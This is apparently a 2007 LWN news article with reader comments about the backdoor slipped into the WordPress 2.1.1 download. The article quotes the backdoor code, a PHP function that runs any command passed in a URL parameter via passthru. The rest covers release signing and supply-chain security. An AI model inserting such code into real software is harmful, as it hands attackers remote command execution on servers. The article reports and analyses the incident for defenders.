The backdooring of WordPress
a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability." In other words, it is yet another weblog platform written in PHP. Like many such platforms, it has a fairly long history of security issues. Even so, the code samples featured in this ifsecure advisory are on the extreme side. One example:
function get_theme_mcommand($mcds) {
passthru($mcds);
}
/* ... */
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
Needless to say, code like this is not a programming error - it is a deliberate backdoor. The project responded quickly, replacing the compromised 2.1.1 release with a fixed 2.1.2 and sending out an advisory. Even so, there are probably sites which installed the 2.1.1 release (which appears to have been distributed with the backdoor for about one week) and which are still vulnerable.
It would be nice if the project would make a little more information available. As others have noted, there are no checksums of good or compromised versions of the software. We also know nothing about how the code was compromised in the first place, beyond this:
Inquiring minds want to know how this could have come about; is there a separate WordPress vulnerability which still needs to be fixed? What steps have been taken to ensure that this sort of security breach cannot happen to future WordPress releases? The insertion of backdoors into services which are directly exposed to the Internet is a scary business; anybody who is running WordPress should be asking the project some serious questions to convince themselves that they will not have to go through this again. Your editor searched in vain for any such discussion in the WordPress forums.
In one sense, WordPress users can consider themselves lucky: the code implementing the backdoor was so crude that it had little chance of escaping detection for long. Had the backdoor code been more subtle, it could well have survived for much longer. One assumes that the WordPress developers are auditing their code, looking for holes inserted with more care. But if they are, they are not talking about it.
In general, backdoors are a frightening prospect for free software developers to ponder. The relatively open nature of many projects must provide a tempting target for scheming crackers, and it is not that hard to imagine that a good-enough developer could manage to code a backdoor in a sufficiently obscure manner that it gets through the review process without being detected. There may well be a project distributing such code now.
That said, a quick look at the (relatively thin) history of compromised free software distributions shows that the normal contribution process is not the preferred way to insert backdoors. Instead, crackers seem to focus on breaking into servers and modifying code there. We can count ourselves fortunate; such attacks are easier to detect and recover from.
The real lesson from this episode, as from the ones that came before, is
that there is a real incentive for crackers to insert malware into free
software distributions. (Clearly, the same incentive exists for
proprietary software, but that does not concern us here). Any project
which is distributing code with any security considerations at all (and
that is most code) needs to think about this threat. If your processes -
or your servers - are vulnerable to attack, it may be your project which
finds its way into the headlines for the wrong reasons.
| Index entries for this article | |
|---|---|
| Security | Backdoors |
| Security | Web application flaws |
Posted Mar 8, 2007 9:22 UTC (Thu)
by tialaramex (subscriber, #21167)
[Link] (2 responses)
1. There was no way for this backdoor to propagate into later versions of WordPress because it was simply inserted into a tarball, the Subversion server with version history in it was unaffected and of course new versions are extracted from that server, not by merging patches with old tarballs.
2. At least one major web host offered the affected WordPress version as a "one click install" feature of their product, this affected hundreds and maybe thousands of their customers. It would be nice to be able to point them at a verification procedure that could have saved them this disaster, but for WordPress no such verification procedure existed.
3. This re-asserts the importance of signed packages for ordinary users, and of trust management for Free Software projects. This is a hard problem. Red Hat can afford to buy specialised hardware and assign an engineer to modify the software for signing RPMs, but small community projects may not have anywhere better than a Sourceforge account or a web server to keep their private GnuPG signing key, and that's almost worse than nothing.
4. It's easy to speculate that "user level access" was obtained by the cracker simply telling the project that he wanted to help in some way. Any volunteer project is vulnerable to untrustworthy people. The project leaders might even have thought (mistakenly) that giving someone user privileges on their web server was /less/ dangerous than giving them SVN commit privileges.
5. I don't see any explanation for how "user level access" escalated to the ability to replace the existing WordPress downloaded. Does this mean that the "user" in question was the webmaster account? If not did the cracker use a known userspace vulnerability to escalate themselves to root? Or were the affected files carelessly left with open write permissions?
Posted Mar 8, 2007 13:02 UTC (Thu)
by cate (subscriber, #1359)
[Link] (1 responses)
{debian machines was also attacked, but AFAIK no files were altered).
So I think that what happened to WordPress could happen also to other projects (hoping that there are no undiscovered backdoors in the wild).
Posted Mar 15, 2007 9:24 UTC (Thu)
by Wol (subscriber, #4433)
[Link]
The kernel bug was discovered fast because there was a nightly process updating CVS from BitKeeper - it tripped over the trojanned CVS file.
Cheers,
Posted Mar 8, 2007 10:07 UTC (Thu)
by nix (subscriber, #2304)
[Link]
Posted Mar 9, 2007 16:41 UTC (Fri)
by jond (subscriber, #37669)
[Link] (1 responses)
Posted Mar 16, 2007 7:20 UTC (Fri)
by muwlgr (guest, #35359)
[Link]
All of this is written without any special knowledge, contributions by the WordPress maintainers would be welcome...The backdooring of WordPress
I remember that also the kernel had a similar problem: someone inserted a backdoor in the CVS tree (the back-end of BK for some developers). Lucky not a lot of people used that version and it was discovered in one single day. The backdooring of WordPress
Yup.The backdooring of WordPress
Wol
I can think of one vaguely-related event, the mICQ obfuscated code flap: <http://lists.debian.org/debian-devel/2003/02/msg00771.html>. But that wasn't a backdoor, it was program-author-inserted obfuscated code that detected an attempt to build a Debian package and keeled over if the person running the program was not the Debian package maintainer... but it was an instance of acting in bad faith, and that's rare enough in the free software world that it's noteworthy.The backdooring of WordPress
In related news, the Debian Security Team have requested that wordpress not be allowed into the next stable release of Debian: <http://bugs.debian.org/413269>The backdooring of WordPress
Nice idea, to have a PHP-free distribution.The backdooring of WordPress
Lot of security would be gained back :>